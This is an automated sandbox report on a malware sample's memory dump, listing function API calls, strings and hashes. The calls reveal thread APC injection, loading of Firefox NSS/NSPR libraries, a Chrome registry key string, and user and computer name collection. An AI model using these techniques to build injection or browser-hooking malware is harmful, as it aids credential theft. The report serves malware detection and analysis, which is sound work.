Instruction Fuzzy Hash: 2F8199B0904309AFC721BF24DD84A1BBBE9FF88344F4449A9F999972A2D770D854CF52

Uniqueness

Uniqueness Score: -1.00%

Function 02B762FA, Relevance: 21.4, APIs: 11, Strings: 1, Instructions: 361memoryCOMMON

Download Yara Rule

APIs

StrToIntExA.SHLWAPI(00000000,00000000,?,76D7F710,00000000,00000000,?,?,02B958C6,?,?,?,?,?,02B720D2,?), ref: 02B76330
StrToIntExA.SHLWAPI(00000000,00000000,?,76D7F710,00000000,00000000,?,?,02B958C6,?,?,?,?,?,02B720D2,?), ref: 02B76362
StrToIntExA.SHLWAPI(00000000,00000000,?,76D7F710,00000000,00000000,?,?,02B958C6,?,?,?,?,?,02B720D2,?), ref: 02B76394
StrToIntExA.SHLWAPI(00000000,00000000,?,76D7F710,00000000,00000000,?,?,02B958C6,?,?,?,?,?,02B720D2,?), ref: 02B763C6
StrToIntExA.SHLWAPI(00000000,00000000,?,76D7F710,00000000,00000000,?,?,02B958C6,?,?,?,?,?,02B720D2,?), ref: 02B763F8
StrToIntExA.SHLWAPI(00000000,00000000,?,76D7F710,00000000,00000000,?,?,02B958C6,?,?,?,?,?,02B720D2,?), ref: 02B7642A
StrToIntExA.SHLWAPI(00000000,00000000,?,76D7F710,00000000,00000000,?,?,02B958C6,?,?,?,?,?,02B720D2,?), ref: 02B7645C
StrToIntExA.SHLWAPI(00000000,00000000,?,76D7F710,00000000,00000000,?,?,02B958C6,?,?,?,?,?,02B720D2,?), ref: 02B7648E
StrToIntExA.SHLWAPI(00000000,00000000,?,76D7F710,00000000,00000000,?,?,02B958C6,?,?,?,?,?,02B720D2,?), ref: 02B764C0
HeapFree.KERNEL32(00000000,?,Scr,?,?,76D7F710,00000000,00000000,?,?,02B958C6,?,?), ref: 02B76523

Part of subcall function 02B884CA: RtlEnterCriticalSection.NTDLL(05AE8D20), ref: 02B884D3
Part of subcall function 02B884CA: HeapFree.KERNEL32(00000000,?,?,?,02B958C6,?,?,?,?,?,02B720D2,?), ref: 02B88505
Part of subcall function 02B884CA: RtlLeaveCriticalSection.NTDLL(05AE8D20), ref: 02B88523

StrToIntExA.SHLWAPI(00000000,00000000,?,76D7F710,00000000,00000000,?,?,02B958C6,?,?,?,?,?,02B720D2,?), ref: 02B7654E

Strings

Scr, xrefs: 02B76502

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: CriticalFreeHeapSection$EnterLeave
String ID: Scr
API String ID: 1298188129-1633706383
Opcode ID: 6dcb4b1615a3ce8746fa0c28b9b646a24723b05df81b253afe2d108ec8d36a7d
Instruction ID: 22d407e2f98dc80481cab09d8537f4f6eb0986385815f623fc84b1dca44e6f45
Opcode Fuzzy Hash: 6dcb4b1615a3ce8746fa0c28b9b646a24723b05df81b253afe2d108ec8d36a7d
Instruction Fuzzy Hash: CFB1BFA1B10A166B8B20FB79CD84E6B279D9B087847598CF5F929D7148EB70D801CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02B805EF, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 91memorystringsynchronizationCOMMON

Download Yara Rule

APIs

wcscpy.NTDLL ref: 02B8061C
GetLogicalDriveStringsW.KERNEL32(00000000,00000000), ref: 02B80628
RtlAllocateHeap.NTDLL(00000000,?), ref: 02B80639
memset.NTDLL ref: 02B80656
GetLogicalDriveStringsW.KERNEL32(?,?), ref: 02B80664
WaitForSingleObject.KERNEL32(00000000), ref: 02B80672
GetDriveTypeW.KERNEL32(?), ref: 02B80680
lstrlenW.KERNEL32(?), ref: 02B8068C
wcscpy.NTDLL ref: 02B8069F
lstrlenW.KERNEL32(?), ref: 02B806B9
HeapFree.KERNEL32(00000000,?), ref: 02B806D2

Strings

\\?\, xrefs: 02B80613

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Drive$HeapLogicalStringslstrlenwcscpy$AllocateFreeObjectSingleTypeWaitmemset
String ID: \\?\
API String ID: 3888849384-4282027825
Opcode ID: 5315edffd210d5bbd37a41d2631b4905f61d27c58deeafe154cd74f2fb709187
Instruction ID: 76197d023365b16ae89f21c538497a479b32604793c7047a0ea16c1c7f3b684f
Opcode Fuzzy Hash: 5315edffd210d5bbd37a41d2631b4905f61d27c58deeafe154cd74f2fb709187
Instruction Fuzzy Hash: 80317C32C01118BFDB11ABA5DD49DEEBF79FF4A3A4B104855F108E3050D731AA65DB64

Uniqueness

Uniqueness Score: -1.00%

Function 02B7A7B1, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 65threadprocesslibraryCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,76D7F5B0,02B87D3D,61636F4C,00000001,?,?), ref: 02B7A7D7
CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 02B7A7E3
GetModuleHandleA.KERNEL32(KERNEL32.DLL,ExitProcess,?,00000000,00000000), ref: 02B7A7FA
GetProcAddress.KERNEL32(00000000), ref: 02B7A801
Thread32First.KERNEL32(?,0000001C), ref: 02B7A811
OpenThread.KERNEL32(001F03FF,00000000,02B87D3D), ref: 02B7A82C
QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 02B7A83D
CloseHandle.KERNEL32(00000000), ref: 02B7A844
Thread32Next.KERNEL32(?,0000001C), ref: 02B7A84D
CloseHandle.KERNEL32(?), ref: 02B7A859

Strings

ExitProcess, xrefs: 02B7A7F0
KERNEL32.DLL, xrefs: 02B7A7F5

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Handle$Close$Thread32$AddressCreateFirstModuleNextOpenProcQueueSnapshotThreadToolhelp32User
String ID: ExitProcess$KERNEL32.DLL
API String ID: 2341152533-108369947
Opcode ID: d736d3ecd15e6b4189a2be19665a5ac8047fac433c59d325214f39fcff60c326
Instruction ID: e84e890b99ba2ff9c0f8c5e500dbe6fa7d97a28221f05993ae4d2105cd7444f4
Opcode Fuzzy Hash: d736d3ecd15e6b4189a2be19665a5ac8047fac433c59d325214f39fcff60c326
Instruction Fuzzy Hash: 49119D72940218FFEF00AFA0DD84DAE7B79EF09395F00447AFA11E6150D7319951DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02B75BD5, Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 69libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(NSPR4.DLL,?,?,00000000), ref: 02B75BEE
LoadLibraryA.KERNEL32(NSS3.DLL,?,00000000), ref: 02B75BFC
LoadLibraryA.KERNEL32(xul.dll,?,00000000), ref: 02B75C11
GetProcAddress.KERNEL32(00000000,PR_GetError), ref: 02B75C1F
GetProcAddress.KERNEL32(00000000,PR_SetError), ref: 02B75C2C

Strings

xul.dll, xrefs: 02B75C0C
PR_SetError, xrefs: 02B75C21
PR_GetError, xrefs: 02B75C19
NSPR4.DLL, xrefs: 02B75BDE, 02B75BE3
NSS3.DLL, xrefs: 02B75BF6, 02B75BFB

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad$AddressProc
String ID: NSPR4.DLL$NSS3.DLL$PR_GetError$PR_SetError$xul.dll
API String ID: 1469910268-282796573
Opcode ID: 94edb3c24054995ec690471b796b4887c61a64139ba16a93e82bfdc10a337058
Instruction ID: 75b581401aab1ca0ac1b7e8453e3df7d56c110a66b136a7b4326e3aff3aa11a7
Opcode Fuzzy Hash: 94edb3c24054995ec690471b796b4887c61a64139ba16a93e82bfdc10a337058
Instruction Fuzzy Hash: 30218E72EC02129BD711FB6FEBC2B057BE5E749BA0B4009AAF818D7251D7B098518B50

Uniqueness

Uniqueness Score: -1.00%

Function 02B745FF, Relevance: 16.6, APIs: 11, Instructions: 130libraryloadernativeCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 02B74632
GetLastError.KERNEL32 ref: 02B74640
NtSetInformationProcess.NTDLL ref: 02B7469A
GetProcAddress.KERNEL32(456C7452,00000000), ref: 02B746D9
GetProcAddress.KERNEL32(61657243), ref: 02B746FA
TerminateThread.KERNEL32(?,00000000,?,00000004,00000000), ref: 02B74751
CloseHandle.KERNEL32(?), ref: 02B74767
CloseHandle.KERNEL32(?), ref: 02B7478D

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: AddressCloseHandleProcProcess$ErrorInformationLastOpenTerminateThread
String ID:
API String ID: 3529370251-0
Opcode ID: cdf46ff58561ae9bc95fa98d5c32db2c61eca05b8548150c339141d2f2a6ce02
Instruction ID: 35863844f86b269aebf07e9322a615f2f44a1f5a725c3de39de41a6391b5aa69
Opcode Fuzzy Hash: cdf46ff58561ae9bc95fa98d5c32db2c61eca05b8548150c339141d2f2a6ce02
Instruction Fuzzy Hash: 3D41CE70908305AFD701DF24C948A2BBBF9FB89349F000EAEF56993120D770DA58CB62

Uniqueness

Uniqueness Score: -1.00%

Function 02B804D7, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 109memoryCOMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(00000000,?), ref: 02B8050E
RtlAllocateHeap.NTDLL(00000000,?), ref: 02B80525
GetUserNameW.ADVAPI32(00000000,?), ref: 02B80532
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,02B84545), ref: 02B80558
GetComputerNameW.KERNEL32(00000000,00000000), ref: 02B8057F
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 02B80593
GetComputerNameW.KERNEL32(00000000,00000000), ref: 02B805A0
HeapFree.KERNEL32(00000000,00000000), ref: 02B805C3

Strings

Client, xrefs: 02B804DE

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: HeapName$AllocateComputerFreeUser
String ID: Client
API String ID: 3239747167-3236430179
Opcode ID: 2745dfa4cc3ddbc315065d0d984b1142d321851f57b93a02c9fbffdba3229e8c
Instruction ID: 0532da5580db924cb8f1d3434dfdfa2da0c4722a8525721a5f9d6acffcb6478b
Opcode Fuzzy Hash: 2745dfa4cc3ddbc315065d0d984b1142d321851f57b93a02c9fbffdba3229e8c
Instruction Fuzzy Hash: 1C311C72A50205EFDB10EFA9CD85BAEB7F9FB44384F104869E909D3241D770E914CB20

Uniqueness

Uniqueness Score: -1.00%

Function 02B94FE1, Relevance: 10.6, APIs: 7, Instructions: 109filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00000000,02B723F9,00000000), ref: 02B94FF9

Part of subcall function 02B9247D: RtlAllocateHeap.NTDLL(00000000,00000200,02B86D11), ref: 02B92489

FindFirstFileW.KERNEL32(?,00000000), ref: 02B95062
lstrlenW.KERNEL32(0000002C), ref: 02B9508A
RemoveDirectoryW.KERNEL32(?), ref: 02B950DC
DeleteFileW.KERNEL32(?), ref: 02B950E7
FindNextFileW.KERNEL32(00000000,00000000), ref: 02B950FA

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: File$Findlstrlen$AllocateDeleteDirectoryFirstHeapNextRemove
String ID:
API String ID: 499515686-0
Opcode ID: 7b05870d98ee748c5410fba73e7dd113a89774de6aca8699a4fb3ce0b523143e
Instruction ID: aed2c1701d0928a5343583dc1e70a5e88aa3c891e5967f8b6762a3386f471ab6
Opcode Fuzzy Hash: 7b05870d98ee748c5410fba73e7dd113a89774de6aca8699a4fb3ce0b523143e
Instruction Fuzzy Hash: 52418C71C80219EFDF22AFA4DD45BAEBFB9EF01348F5041E5E905A6160DB718A90DF90

Uniqueness

Uniqueness Score: -1.00%

Function 02B8956E, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 105stringnativeCOMMON

Download Yara Rule

APIs

NtQueryKey.NTDLL(?,00000003,00000000,00000000,?), ref: 02B895BD
lstrlenW.KERNEL32(?), ref: 02B895CB
NtQueryKey.NTDLL(?,00000003,00000000,?,?), ref: 02B895F6
lstrcpyW.KERNEL32(00000006,00000000), ref: 02B89623

Strings

SOFTWARE\Classes\Chrome, xrefs: 02B8963A
DelegateExecute, xrefs: 02B89595

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Query$lstrcpylstrlen
String ID: DelegateExecute$SOFTWARE\Classes\Chrome
API String ID: 3961825720-1743081400
Opcode ID: 913054eb3663c774a9b28ca2f21d468b37e6c65a97fcdb8988dd6f0e29dddbb6
Instruction ID: d2030cc32cbe76f75eec7d91fc5c8cbc1b9530ea1150688f7a52179e5c320f18
Opcode Fuzzy Hash: 913054eb3663c774a9b28ca2f21d468b37e6c65a97fcdb8988dd6f0e29dddbb6
Instruction Fuzzy Hash: 4A314D71900649FFEF11AFA8CD85EAEBBB8FF05354F1080A9F909A6250D771DA11DB50

Uniqueness

Uniqueness Score: -1.00%

Function 02B9298D, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 02B929AF

Part of subcall function 02B79DAC: RtlNtStatusToDosError.NTDLL(00000000), ref: 02B79DE4
Part of subcall function 02B79DAC: SetLastError.KERNEL32(00000000), ref: 02B79DEB

GetLastError.KERNEL32(?,00000318,00000008), ref: 02B92ABF

Part of subcall function 02B84C67: RtlNtStatusToDosError.NTDLL(00000000), ref: 02B84C7F

memcpy.NTDLL(00000218,02B96E10,00000100,?,00010003,?,?,00000318,00000008), ref: 02B92A3E
RtlNtStatusToDosError.NTDLL(00000000), ref: 02B92A98

Strings

, xrefs: 02B92A05

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Error$Status$Last$memcpymemset
String ID:
API String ID: 945571674-3916222277
Opcode ID: 7c44c8a68716a7db7ecef15f5d83bdea4908a4c63b0044c5354048c38fdefbd6
Instruction ID: 3dfdeb2cfc1fd232b77d1f44dd6be0e2cf651048575982914772304976d55b86
Opcode Fuzzy Hash: 7c44c8a68716a7db7ecef15f5d83bdea4908a4c63b0044c5354048c38fdefbd6
Instruction Fuzzy Hash: 31315E76D01209AFEF20DF64D985AAAB7B8EB04354F1445BAE929E7240E730AE54CF50

Uniqueness

Uniqueness Score: -1.00%

Function 02B8ED4B, Relevance: 7.9, APIs: 6, Instructions: 399COMMON

Download Yara Rule

APIs

Part of subcall function 02B85393: memset.NTDLL ref: 02B853B3

Part of subcall function 02B85393: memset.NTDLL ref: 02B854E7
Part of subcall function 02B85393: memset.NTDLL ref: 02B854FC

memcpy.NTDLL(?,00008F12,0000011E), ref: 02B8EDD0
memset.NTDLL ref: 02B8EE06
memset.NTDLL ref: 02B8EE54
memset.NTDLL ref: 02B8EED3
memset.NTDLL ref: 02B8EF42
memset.NTDLL ref: 02B8F012

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: memset$memcpy
String ID:
API String ID: 368790112-0
Opcode ID: 3a92b0a346c5739c4c5b9348a59b18e481465c69aa70805560f0a777734d0763
Instruction ID: d826ffebd76a635c27898175b4845dbff616ad9a0e48dd3a0bd95bd9b48ee035
Opcode Fuzzy Hash: 3a92b0a346c5739c4c5b9348a59b18e481465c69aa70805560f0a777734d0763
Instruction Fuzzy Hash: EDF1F170600B99CFDB31EF69C8846AABBF0FF51304F5449ADD5DA96A81D331EA85CB10

Uniqueness

Uniqueness Score: -1.00%

Function 02B8B585, Relevance: 6.0, APIs: 4, Instructions: 45pipeCOMMON

Download Yara Rule

APIs

CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,02B9E0D4,02B9E08C), ref: 02B8B5A9
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02B917C0), ref: 02B8B5F4

Part of subcall function 02B8C0AB: CreateThread.KERNELBASE(00000000,00000000,00000000,?,00000000,02B7402D), ref: 02B8C0C2
Part of subcall function 02B8C0AB: QueueUserAPC.KERNELBASE(?,00000000,?,?,?,02B958C6,?,?,?,?,?,02B720D2,?), ref: 02B8C0D7
Part of subcall function 02B8C0AB: GetLastError.KERNEL32(00000000,?,?,02B958C6,?,?,?,?,?,02B720D2,?), ref: 02B8C0E2
Part of subcall function 02B8C0AB: TerminateThread.KERNEL32(00000000,00000000,?,?,02B958C6,?,?,?,?,?,02B720D2,?), ref: 02B8C0EC
Part of subcall function 02B8C0AB: CloseHandle.KERNEL32(00000000,?,?,02B958C6,?,?,?,?,?,02B720D2,?), ref: 02B8C0F3
Part of subcall function 02B8C0AB: SetLastError.KERNEL32(00000000,?,?,02B958C6,?,?,?,?,?,02B720D2,?), ref: 02B8C0FC

GetLastError.KERNEL32(Function_00005A92,00000000,00000000), ref: 02B8B5DC
CloseHandle.KERNEL32(00000000), ref: 02B8B5EC

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: ErrorLast$CloseCreateHandleThread$NamedPipeQueueTerminateUser
String ID:
API String ID: 1700061692-0
Opcode ID: ca1868d53e0b2cfecd5316ee33bd1ef73c93c7e698447c780cf5eb8abebb1f4a
Instruction ID: b2366ae5b128516de722362b504336c16fc53843d85a8d525ac286ce7bdc4fef
Opcode Fuzzy Hash: ca1868d53e0b2cfecd5316ee33bd1ef73c93c7e698447c780cf5eb8abebb1f4a
Instruction Fuzzy Hash: 98F028B0381301AFE3246B789C99E777798DB453B8B000A75F91EC32C0DB604C55CA70

Uniqueness

Uniqueness Score: -1.00%

Function 0040166F, Relevance: 6.0, APIs: 4, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040166F() {
				void* _t1;
				long _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t8;

				_t8 =  *0x404130;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x40413c = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 <= 5) {
					_t4 = 0x32;
					return _t4;
				} else {
					 *0x40412c = _t3;
					_t5 = GetCurrentProcessId();
					 *0x404128 = _t5;
					 *0x404130 = _t8;
					_t6 = OpenProcess(0x10047a, 0, _t5);
					 *0x404124 = _t6;
					if(_t6 == 0) {
						 *0x404124 =  *0x404124 | 0xffffffff;
					}
					return 0;
				}
			}

0x00401670
0x0040167e
0x00401686
0x0040168b
0x004016d5
0x004016d5
0x0040168d
0x00401695
0x004016d1
0x004016d3
0x00401697
0x00401697
0x0040169c
0x004016aa
0x004016af
0x004016b5
0x004016bd
0x004016c2
0x004016c4
0x004016c4
0x004016ce
0x004016ce

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00401011), ref: 0040167E
GetVersion.KERNEL32(?,00401011), ref: 0040168D
GetCurrentProcessId.KERNEL32(?,00401011), ref: 0040169C
OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00401011), ref: 004016B5

Memory Dump Source

Source File: 00000001.00000002.448591330.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.448578715.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.448616383.0000000000403000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.448636811.0000000000405000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.448653832.0000000000406000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CreateCurrentEventOpenVersion
String ID:
API String ID: 845504543-0
Opcode ID: 1eaa3d8f0a79511679afa7aa4da2cd3e92854b776273d2c7a2edf8e31e9fdd74
Instruction ID: c9042b96710faffa9d358b0cbcc1e01d1c02a10afbbc70377db625d186b9e90a
Opcode Fuzzy Hash: 1eaa3d8f0a79511679afa7aa4da2cd3e92854b776273d2c7a2edf8e31e9fdd74
Instruction Fuzzy Hash: EBF067B1A512009FE710AF68BF09B953FA8A358713F04413AF781F91F4D3B045808B4C

Uniqueness

Uniqueness Score: -1.00%

Function 02B77878, Relevance: 4.5, APIs: 3, Instructions: 45nativethreadCOMMON

Download Yara Rule

APIs

NtQueryInformationThread.NTDLL(?,00000000,?,0000001C,00000000), ref: 02B7788C
GetLastError.KERNEL32(?,?,?,0000001C,?), ref: 02B778CC
RtlNtStatusToDosError.NTDLL(00000000), ref: 02B778D5

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Error$InformationLastQueryStatusThread
String ID:
API String ID: 2450163249-0
Opcode ID: 1745b510cbf5e5cc822245c84bdb9021792461487e8559b5ba5bd9ad9f093db6
Instruction ID: 8e755455ddb42d402ca1392c6a5f7b3391caf68a333951e22aec6c939f9052e5
Opcode Fuzzy Hash: 1745b510cbf5e5cc822245c84bdb9021792461487e8559b5ba5bd9ad9f093db6
Instruction Fuzzy Hash: 0E016D75940108FFEB10ABA6DD04EEEBBBEEB88740F0004A5F955E2050EB31D914EB20

Uniqueness

Uniqueness Score: -1.00%

Function 02B7AA15, Relevance: 3.0, APIs: 2, Instructions: 48nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(00000005,00000000,00010000,00010000), ref: 02B7AA46
RtlNtStatusToDosError.NTDLL(C000009A), ref: 02B7AA7D

Part of subcall function 02B84FB0: HeapFree.KERNEL32(00000000,00000200,02B86EB2,00000000,00000100,00000200), ref: 02B84FBC

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: ErrorFreeHeapInformationQueryStatusSystem
String ID:
API String ID: 2533303245-0
Opcode ID: a58bf34d39356aec99aae9b81863de5f35bd9e9398e89e649a0e2e93ea66e1f0
Instruction ID: 4c367a0189b680a12377f694feecc08c8b0b1bc9d40df0a1ee6b7e55c1b8fa93
Opcode Fuzzy Hash: a58bf34d39356aec99aae9b81863de5f35bd9e9398e89e649a0e2e93ea66e1f0
Instruction Fuzzy Hash: 4701A936902524FBDB619A648F04AAFBA69DF86B54F0601A4ED3563110D7749E01DBE0

Uniqueness

Uniqueness Score: -1.00%

Function 02B840A7, Relevance: 3.0, APIs: 2, Instructions: 37nativeCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 02B840C6
NtQueryInformationProcess.NTDLL(00000000,00000000,?,00000018,00000000), ref: 02B840DE

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: InformationProcessQuerymemset
String ID:
API String ID: 2040988606-0
Opcode ID: a806c2556b028fd44b9ef8d3fe4890493cdfed408fb75c909226806180754a60
Instruction ID: b8935eb28294f3b70fdc5aa95f0555ad7abf9460f9ac098686a737b52d89c51c
Opcode Fuzzy Hash: a806c2556b028fd44b9ef8d3fe4890493cdfed408fb75c909226806180754a60
Instruction Fuzzy Hash: 95F04FB690021CBADB20EA90DC05FDE7BBDDB14784F4440A1AA08E6081D370DA94CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02B79DAC, Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

RtlNtStatusToDosError.NTDLL(00000000), ref: 02B79DE4
SetLastError.KERNEL32(00000000), ref: 02B79DEB

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Error$LastStatus
String ID:
API String ID: 4076355890-0
Opcode ID: 95e4cf0987d32dd5ec37c8ee955579caae9bfd52c11206466c747d0b686c320d
Instruction ID: ab51892f63f1a749b517b879c31bb2c1f74d27483e5a22f08db14d99b7ef0989
Opcode Fuzzy Hash: 95e4cf0987d32dd5ec37c8ee955579caae9bfd52c11206466c747d0b686c320d
Instruction Fuzzy Hash: 21F0F8B1951309FBEB05CB95DA4ABAEB7BCEB04349F104048E604A7180EBB4AB14DB64

Uniqueness

Uniqueness Score: -1.00%

Function 02B81606, Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

RtlNtStatusToDosError.NTDLL(C0000002), ref: 02B81633
SetLastError.KERNEL32(00000000,?,02B8197E,?,00000000,00000000,00000004,?,00000000,00000000,76D24EE0,00000000), ref: 02B8163A

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Error$LastStatus
String ID:
API String ID: 4076355890-0
Opcode ID: 99af9bfbe948502b64d4ad24b87903b9464274126bd1e6b99495da9d6ba4c829
Instruction ID: 6a27164339e6d2d0fbfb7607d6b343a037ba1a452d44703c657e5724cbef1791
Opcode Fuzzy Hash: 99af9bfbe948502b64d4ad24b87903b9464274126bd1e6b99495da9d6ba4c829
Instruction Fuzzy Hash: D8E01A3264122AABCF026EE99D05D9A7B69EB08690B048410FA49D2120C731C871DBE0

Uniqueness

Uniqueness Score: -1.00%

Function 02B737E7, Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

RtlNtStatusToDosError.NTDLL(C0000002), ref: 02B73814
SetLastError.KERNEL32(00000000,?,02B92A79,?,00000000,00000000,00000318,00000020,?,00010003,?,?,00000318,00000008), ref: 02B7381B

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Error$LastStatus
String ID:
API String ID: 4076355890-0
Opcode ID: bf1974509f3a0312a0671a5babf0b4009cb71d77aefab4036ecd408da2e6e8f0
Instruction ID: 09e8a0720adfd7a71852d8ce098ca939a300e17c54990d5ee2ca299d6125bc44
Opcode Fuzzy Hash: bf1974509f3a0312a0671a5babf0b4009cb71d77aefab4036ecd408da2e6e8f0
Instruction Fuzzy Hash: 62E01A32A4021AABCF125EE9AD04D9B7BA9FB09790B008465FE11C2120D731E870ABE0

Uniqueness

Uniqueness Score: -1.00%

Function 02B7D0DC, Relevance: 2.9, APIs: 2, Instructions: 416COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 02B7D4B4
memset.NTDLL ref: 02B7D4C3

Part of subcall function 02B79DFC: memset.NTDLL ref: 02B79E0D
Part of subcall function 02B79DFC: memset.NTDLL ref: 02B79E19
Part of subcall function 02B79DFC: memset.NTDLL ref: 02B79E44

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 901fb57dd579aca51b006c865f834b69d11bb4b6438bcc436a2491ef44e66cbb
Instruction ID: fd24d5b012b6269fb42e091e0fb4001f6d191a4c6313bb830fc83f90e7a798a3
Opcode Fuzzy Hash: 901fb57dd579aca51b006c865f834b69d11bb4b6438bcc436a2491ef44e66cbb
Instruction Fuzzy Hash: A7021F70601B528FC779CE29C680626B7F1FF54A647649AAEC6E786A90D331F481CB14

Uniqueness

Uniqueness Score: -1.00%

Function 02B88BF3, Relevance: 1.9, APIs: 1, Instructions: 610COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 02B8928A

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: ecbea8a852eaafebc1e0ec98c08f47c6db272d4ef72c1f33184d83e3dde19467
Instruction ID: 61abb9335ae33223db8ffee6cd5b12856d72dae2028f8fb5a8b29c05eab886cf
Opcode Fuzzy Hash: ecbea8a852eaafebc1e0ec98c08f47c6db272d4ef72c1f33184d83e3dde19467
Instruction Fuzzy Hash: 8F22747BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0

Uniqueness

Uniqueness Score: -1.00%

Function 02B7E384, Relevance: 1.8, Strings: 1, Instructions: 583COMMON

Download Yara Rule

Strings

, xrefs: 02B7E6E9

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 87ef98af551417ece8ef683cdcf9cf04191adf0180e429ea87f5dd7612f54f43
Instruction ID: 2bc8569beaa7d33f371ec70d7a1d8c43821422a8fae846f38f1c7367b65966c0
Opcode Fuzzy Hash: 87ef98af551417ece8ef683cdcf9cf04191adf0180e429ea87f5dd7612f54f43
Instruction Fuzzy Hash: 20429C70A04B458FCB29CF69C4907AABBF1FF89308F5489EDC4A69B651E734E485CB10

Uniqueness

Uniqueness Score: -1.00%

Function 02B8D057, Relevance: 1.8, APIs: 1, Instructions: 556COMMON

Download Yara Rule

APIs

memcpy.NTDLL(?,?,00000000,000000FE,00000000,?,00000000), ref: 02B8D415

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
